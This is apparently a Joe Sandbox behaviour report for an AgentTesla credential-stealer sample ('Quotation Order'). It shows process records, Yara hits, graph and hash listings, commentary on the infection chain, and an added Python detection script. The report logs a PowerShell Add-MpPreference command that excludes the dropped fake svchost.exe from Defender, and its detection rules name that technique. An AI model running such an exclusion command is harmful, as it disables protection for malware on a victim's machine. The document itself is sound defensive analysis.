                                                                                                                                                                                                                                                  Imagebase:0x7ff611ba0000
                                                                                                                                                                                                                                                  File size:570'736 bytes
                                                                                                                                                                                                                                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                  Start time:10:07:26
                                                                                                                                                                                                                                                  Start date:26/04/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\avdfUcC\avdfUcC.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7df220000
                                                                                                                                                                                                                                                  File size:43'008 bytes
                                                                                                                                                                                                                                                  MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:true

Target ID: 51
Start time: 10:07:26
Start date: 26/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 10:07:35
Start date: 26/04/2024
Path: C:\Users\user\AppData\Roaming\svchost.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Roaming\svchost.exe"
Imagebase: 0x2dfb78c0000
File size: 912'780 bytes
MD5 hash: D797AAE1EAF481E9C887482192B84109
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000034.00000002.1652420227.000002DFB9BBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: true

Target ID: 53
Start time: 10:07:35
Start date: 26/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 10:07:37
Start date: 26/04/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
Imagebase: 0x7ff7b2bb0000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 55
Start time: 10:07:37
Start date: 26/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff620390000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 10:07:37
Start date: 26/04/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase: 0xb80000
File size: 108'664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.0000000003282000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000038.00000002.2517527074.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited: false
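
The records for targets 52, 54 and 56 above form a recognisable chain: a copy of the sample dropped under the user's roaming profile with the name of a system process, a PowerShell call that adds that copy to the Defender exclusion list, and CasPol.exe started with no arguments and later found carrying AgentTesla in memory. Two caveats follow from the records themselves. The powershell.exe entry reports neither elevated nor administrator privileges, and Add-MpPreference needs an elevated token to change Defender settings, so in this run the exclusion most likely was not applied; the attempt is still the signal to alert on. The Yara matches on CasPol.exe are on memory dumps (.sdmp sources), not on the file on disk, which is the stock Microsoft binary. The Python below is an added example, not Joe Sandbox output and not code from the sample: it runs three rules of the kind the report's Sigma hits name over constructed Sysmon-style process-creation records built from those three entries. The field names follow Sysmon Event ID 1, the process ids are invented, the list of injection-target binaries is a heuristic chosen for the example, and the exclusion rule matches only the plain-text command line (an -EncodedCommand variant has to be Base64-decoded before the rule sees it).

```python
"""Triage rules for the process chain recorded above, run over constructed
Sysmon-style (Event ID 1) process-creation records.  Added example; not
Joe Sandbox output and not code from the sample."""
import ntpath
import re

# Image names that normally run only from the Windows system directories.
SYSTEM_BINARIES = {"svchost.exe", "conhost.exe", "lsass.exe", "csrss.exe",
                   "winlogon.exe", "smss.exe", "services.exe", "wininit.exe"}
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Signed .NET framework utilities that are often started with no arguments
# purely to be hollowed.  Heuristic list chosen for this example, not an
# authoritative one.
INJECTION_TARGETS = {"caspol.exe", "regasm.exe", "regsvcs.exe",
                     "installutil.exe", "msbuild.exe", "aspnet_compiler.exe"}

# Add-MpPreference / Set-MpPreference with any -Exclusion* parameter.
DEFENDER_EXCLUSION = re.compile(
    r"\b(add|set)-mppreference\b.*-exclusion(path|process|extension)",
    re.IGNORECASE)


def _image_name(event):
    return ntpath.basename(event["Image"]).lower()


def _argv_rest(cmdline):
    """Return the command line after the executable token (Windows quoting)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        close = cmdline.find('"', 1)
        return cmdline[close + 1:].strip() if close != -1 else ""
    parts = cmdline.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def system_name_outside_system_dir(event):
    """System-process name running from outside the system directories."""
    directory = ntpath.dirname(event["Image"]).lower()
    return _image_name(event) in SYSTEM_BINARIES and directory not in SYSTEM_DIRS


def defender_exclusion_added(event):
    """PowerShell adding a Defender exclusion (plain-text command line only)."""
    return (_image_name(event) in {"powershell.exe", "pwsh.exe"}
            and DEFENDER_EXCLUSION.search(event["CommandLine"]) is not None)


def bare_injection_target(event):
    """Hollowing candidate: a known target binary started with no arguments."""
    return (_image_name(event) in INJECTION_TARGETS
            and _argv_rest(event["CommandLine"]) == "")


RULES = (
    ("system_process_name_in_unexpected_location", system_name_outside_system_dir),
    ("defender_exclusion_via_powershell", defender_exclusion_added),
    ("injection_target_started_without_arguments", bare_injection_target),
)


def triage(events):
    """Return (ProcessId, rule_name) pairs for every rule hit, in event order."""
    return [(ev["ProcessId"], name) for ev in events
            for name, check in RULES if check(ev)]


# Constructed records mirroring Target IDs 52, 54 and 56 above, plus the
# conhost.exe helper (Target ID 55) as a benign control.  Process ids are
# invented; paths and command lines are the ones the report shows.
SAMPLE_EVENTS = [
    {"ProcessId": 5201, "Image": r"C:\Users\user\AppData\Roaming\svchost.exe",
     "CommandLine": r'"C:\Users\user\AppData\Roaming\svchost.exe"'},
    {"ProcessId": 5401,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'Add-MpPreference -ExclusionPath '
                    r'"C:\Users\user\AppData\Roaming\svchost.exe" -Force'},
    {"ProcessId": 5501, "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    {"ProcessId": 5601,
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"'},
]

if __name__ == "__main__":
    for pid, rule in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Run directly it prints one hit for each of the three sample entries and nothing for conhost.exe. Each rule is a stand-alone function on a record, so the set can be dropped into a real pipeline once the source's field names are mapped onto Image, CommandLine and ProcessId.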

Target ID: 57
Start time: 10:07:37
Start date: 26/04/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase: 0xe10000
File size: 108'664 bytes
MD5 hash: 914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: true


Execution Graph

Execution Coverage: 12.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 33
Total number of Limit Nodes: 3
Execution graph (interactive Joe Sandbox graph; the node and edge dump is reduced here to what it records): 33 nodes rooted at 7ff7c19c3b91, 7ff7c19c2e84, 7ff7c19c2d84 and 7ff7c19c0a58. The API calls reached are LoadLibraryA (from 7ff7c19c2930, 7ff7c19c2780 and 7ff7c19c0618, the last two called repeatedly), VirtualProtect (7ff7c19c2d8d) and FreeConsole (7ff7c19c0a61). Repeated LoadLibraryA calls followed by a VirtualProtect in a region the coverage figures classify entirely as dynamic/decrypted code is the pattern of a stub resolving its imports and fixing up page protections at run time rather than through the PE import table.

Control-flow Graph

Legend: • Executed • Not Executed
Control-flow graph (interactive; the basic-block list is reduced here to what it records): function starting at 7ff7c19c2528, basic blocks spanning 7ff7c19c4ae1 to 7ff7c19c500e, with calls to 7ff7c19c49a0, 7ff7c19c49f0, 7ff7c19c4148 and 7ff7c19c4168.
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: 15054a772d197fdb6d634bed47e29a8b0f454132e64b3c30c205dae82c5c0352
                                                                                                                                                                                                                                                    • Instruction ID: 129fb726102c0bc8abd20cc3bbeb0b7508b1eb4cf1960e69439db143d10e62bb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15054a772d197fdb6d634bed47e29a8b0f454132e64b3c30c205dae82c5c0352
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43126A30A1CA8A4FE349EF2898955B1B7E1FF45328B5442BDD48EC7197DE24F842CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: fish
                                                                                                                                                                                                                                                    • API String ID: 0-1064584243
                                                                                                                                                                                                                                                    • Opcode ID: 8bc72b9153288a7c572de2f509ee88dc29c02553963bfa8676b6e97764a5b7a9
                                                                                                                                                                                                                                                    • Instruction ID: 470803b735962489dd5160c8beca7916e11ebc693714af5dba99357b75441350
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc72b9153288a7c572de2f509ee88dc29c02553963bfa8676b6e97764a5b7a9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CB15C31B1CA894FD75CBB3898655BAB7E1FF96324B44017ED08BC3193DE28A802C781
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a51194b8dc1925ee63eac621abbf37292a644a6057f2ff8e5b167bef5d520851
                                                                                                                                                                                                                                                    • Instruction ID: c289d0b8189c32b06e7c0595f5121e0818285f776520358e9beec3a8305df6a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a51194b8dc1925ee63eac621abbf37292a644a6057f2ff8e5b167bef5d520851
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07B2243060CB894FD719EF2884914B5B7E2FF85315B5446BEE4CAC72A6DE34E846CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
• API String ID:
• Opcode ID: 580816a74ce7d71c72430b60a2c2a5583a8cf464e7be6434059e91f74d7002c9
• Instruction ID: 13dc75e88c8cde596eb9b1ab6c822a19bbc032213818478fc95c97aead3c34e7
• Opcode Fuzzy Hash: 580816a74ce7d71c72430b60a2c2a5583a8cf464e7be6434059e91f74d7002c9
• Instruction Fuzzy Hash: 18A2383050CB894FE309EF38C4A44A5BBE1FF96315B5445BED0CAC72A2DA79E846CB51
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b7129ef06db7d467331638d8997c78eb95b078f29fc7916f00e0d4880284fa10
• Instruction ID: c1365015638cc9b50adcccfde4558d9c3aa15e952c836a54a7405f58bda14fdf
• Opcode Fuzzy Hash: b7129ef06db7d467331638d8997c78eb95b078f29fc7916f00e0d4880284fa10
• Instruction Fuzzy Hash: 76520730A08A598FDB68EE2CC465679B7E1FF55314F5401BDE08EC72A2DE64EC42CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cc60ac2ef1b05958e985c81e53a0735255852c4008a9bb47ce0344e741e58d56
• Instruction ID: d0e1c7424165ffed3e1b7bf2a81b1baff6dc1fd76c9633802269b8ebd0a00fc9
• Opcode Fuzzy Hash: cc60ac2ef1b05958e985c81e53a0735255852c4008a9bb47ce0344e741e58d56
• Instruction Fuzzy Hash: DBD1553060CB864FE31CDF2984A51B5B7E2FF96315B54867ED4CBC32A2DA74A442CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e51d57a2780a0a80d8844ac3970589778f1e61cd0e135ac84ccf75cfb384ebf8
• Instruction ID: b6a49ad7ada13054390f191e11f50a42a54b010b14d5a3c6bacddcfc20e6d2ed
• Opcode Fuzzy Hash: e51d57a2780a0a80d8844ac3970589778f1e61cd0e135ac84ccf75cfb384ebf8
• Instruction Fuzzy Hash: CA414831A0C7890FD71E9A3888661B57BA5EB83220B5582BFD187CB6A7DC18680783D1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 75e451d39e7f41f666d9eeea896a5cc367c9f2b6ed41456a7a1ae07f34c11986
• Instruction ID: e9e30049379e212c97d24752bcf4eb32abbd767ac461e8b44475cdb93b1ce401
• Opcode Fuzzy Hash: 75e451d39e7f41f666d9eeea896a5cc367c9f2b6ed41456a7a1ae07f34c11986
• Instruction Fuzzy Hash: 89412A3150D7C91FD71F9B3888651A57FA5EB43210B1681BFD186C7197DD285C06C7A1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
Similarity
• API ID: LibraryLoad
• String ID: $
• API String ID: 1029625771-3993045852
• Opcode ID: b75020a4f75239134960606f8e3c86369df438c3560eba80bfbd4e0d1f24512b
• Instruction ID: 26f47e8a6416466033afc51703d68d1c70e060335393f5dc02adf13e7920ee5d
• Opcode Fuzzy Hash: b75020a4f75239134960606f8e3c86369df438c3560eba80bfbd4e0d1f24512b
• Instruction Fuzzy Hash: DE81A230508A8D4FEB58EF2898557F97BD1FF59360F10417AE84EC7292CA74A881CB92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
Similarity
• API ID:
• String ID: A
• API String ID: 0-3554254475
• Opcode ID: d8f35d3deafac2d15c4b066f10692674fba732157be3b102a744535e14785486
• Instruction ID: 8b168550aa7b3b793a3c986f2fd4cd8b5084f2e27d11513c9e3c474f681e0ccd
• Opcode Fuzzy Hash: d8f35d3deafac2d15c4b066f10692674fba732157be3b102a744535e14785486
• Instruction Fuzzy Hash: E2323B3580CA898FD755EF28C855AB8BBA0FF55310F5406BBD08ECB192DA74E846CBD1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 610 7ff7c1aa0002-7ff7c1aa001b 611 7ff7c1aa0279-7ff7c1aa027c 610->611 612 7ff7c1aa0284-7ff7c1aa0286 611->612 613 7ff7c1aa0288-7ff7c1aa0289 612->613 614 7ff7c1aa02f7-7ff7c1aa0309 612->614 617 7ff7c1aa024f-7ff7c1aa026d 613->617 618 7ff7c1aa028b-7ff7c1aa028d 613->618 615 7ff7c1aa030f-7ff7c1aa0348 614->615 616 7ff7c1aa03b1-7ff7c1aa03b7 614->616 627 7ff7c1aa03b9-7ff7c1aa03c8 615->627 629 7ff7c1aa034a-7ff7c1aa034d 615->629 616->627 617->616 633 7ff7c1aa0273-7ff7c1aa0278 617->633 623 7ff7c1aa028f-7ff7c1aa02a0 618->623 624 7ff7c1aa02d4 618->624 630 7ff7c1aa0232-7ff7c1aa024e 623->630 631 7ff7c1aa02a2-7ff7c1aa02b8 623->631 624->616 628 7ff7c1aa02da-7ff7c1aa02f5 624->628 632 7ff7c1aa03c9-7ff7c1aa0401 627->632 628->614 629->632 634 7ff7c1aa034f 629->634 630->617 631->616 635 7ff7c1aa02be-7ff7c1aa02d1 631->635 632->627 636 7ff7c1aa0403-7ff7c1aa067a 632->636 633->611 637 7ff7c1aa0351-7ff7c1aa035f 634->637 638 7ff7c1aa0396-7ff7c1aa03b0 634->638 635->624 645 7ff7c1aa067c-7ff7c1aa067e 636->645 646 7ff7c1aa06eb 636->646 647 7ff7c1aa0680 645->647 648 7ff7c1aa06fa-7ff7c1aa0708 645->648 649 7ff7c1aa0746-7ff7c1aa0772 646->649 652 7ff7c1aa0682-7ff7c1aa06a8 647->652 653 7ff7c1aa06c6-7ff7c1aa06c7 647->653 654 7ff7c1aa06c1-7ff7c1aa06c5 648->654 655 7ff7c1aa070b 648->655 650 7ff7c1aa0a42-7ff7c1aa0a48 649->650 651 7ff7c1aa0778-7ff7c1aa078b 649->651 666 7ff7c1aa0a49-7ff7c1aa0a56 650->666 651->650 659 7ff7c1aa078c-7ff7c1aa07bd 651->659 664 7ff7c1aa06aa-7ff7c1aa06b9 652->664 665 7ff7c1aa06bc-7ff7c1aa06bf 652->665 654->653 655->649 658 7ff7c1aa0969-7ff7c1aa0971 655->658 662 7ff7c1aa0974-7ff7c1aa097a 658->662 659->650 663 7ff7c1aa07c3-7ff7c1aa07d6 659->663 667 7ff7c1aa097d-7ff7c1aa0990 662->667 675 7ff7c1aa07d8-7ff7c1aa07dd 663->675 676 
7ff7c1aa0847-7ff7c1aa0859 663->676 664->665 665->654 670 7ff7c1aa0a57-7ff7c1aa0a90 666->670 668 7ff7c1aa0993 667->668 668->650 671 7ff7c1aa0999-7ff7c1aa09b5 668->671 670->666 673 7ff7c1aa0a93-7ff7c1aa0cfe 670->673 683 7ff7c1aa09d2-7ff7c1aa09e6 671->683 684 7ff7c1aa09b7-7ff7c1aa09cc 671->684 687 7ff7c1aa07df-7ff7c1aa0808 675->687 688 7ff7c1aa0824 675->688 676->650 678 7ff7c1aa085f-7ff7c1aa0872 676->678 690 7ff7c1aa0874-7ff7c1aa0877 678->690 691 7ff7c1aa08e3-7ff7c1aa08f0 678->691 683->670 689 7ff7c1aa09e8-7ff7c1aa09ed 683->689 684->683 687->650 703 7ff7c1aa080e-7ff7c1aa0821 687->703 688->650 693 7ff7c1aa082a-7ff7c1aa0845 688->693 689->662 700 7ff7c1aa09ef 689->700 696 7ff7c1aa08f3 690->696 697 7ff7c1aa0879 690->697 691->696 693->676 696->650 699 7ff7c1aa08f9-7ff7c1aa090c 696->699 701 7ff7c1aa08c0 697->701 702 7ff7c1aa087b-7ff7c1aa08a2 697->702 699->667 709 7ff7c1aa090e-7ff7c1aa0912 699->709 700->650 704 7ff7c1aa08c2 701->704 705 7ff7c1aa08c3-7ff7c1aa08e1 701->705 702->650 710 7ff7c1aa08a8-7ff7c1aa08be 702->710 703->688 704->705 705->691 709->668 712 7ff7c1aa0914 709->712 710->650 711 7ff7c1aa08c4-7ff7c1aa08f0 710->711 711->696
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1294309321.00007FF7C1AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1AA0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c1aa0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: A
                                                                                                                                                                                                                                                    • API String ID: 0-3554254475
                                                                                                                                                                                                                                                    • Opcode ID: 70a7e1734fe359cab35f6f203c56892ce90dd952a30250da16edcbf1373fd7f2
                                                                                                                                                                                                                                                    • Instruction ID: 14f8722be5aebdbce45b3eb533008dc284f655bf5efc121c33df1a1920ca7170
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a7e1734fe359cab35f6f203c56892ce90dd952a30250da16edcbf1373fd7f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80122A3180CA898FDB56EF18C854AB9BBA0FF55314F5402BAD04ECB197CA74E846CBD1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; calls LoadLibraryA)
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1029625771-0
                                                                                                                                                                                                                                                    • Opcode ID: 3f70f36904818fe9f86d6229d0a6eda63349fb2de35941c5b78347b0a12ce3ab
                                                                                                                                                                                                                                                    • Instruction ID: 7745d3d80cc4422ad178a69eb5259c6c165ba40875f164b8ff82e0611cf0d70a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f70f36904818fe9f86d6229d0a6eda63349fb2de35941c5b78347b0a12ce3ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66518130508A8D8FEB98EF18C8557E977E1FB59350F10413EE84EC7292DA74E981CB92
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; calls VirtualProtect)
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: 9eb191c8e53d2f0240c215f3a2c2183f6814b44dd2d9b0f5c1f4ccddb927ad2a
                                                                                                                                                                                                                                                    • Instruction ID: a3350909af581f43f3111202694d1a9b6a9676f90b21dc008cbab2467175d768
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9eb191c8e53d2f0240c215f3a2c2183f6814b44dd2d9b0f5c1f4ccddb927ad2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1131F83190CA4C5FDB08EF58984A6F9BBE1FB66321F04426FD049C3292DF746856CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph (graph rendering not reproduced; calls VirtualProtect)
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1293568416.00007FF7C19C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C19C0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff7c19c0000_Quotation Order.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
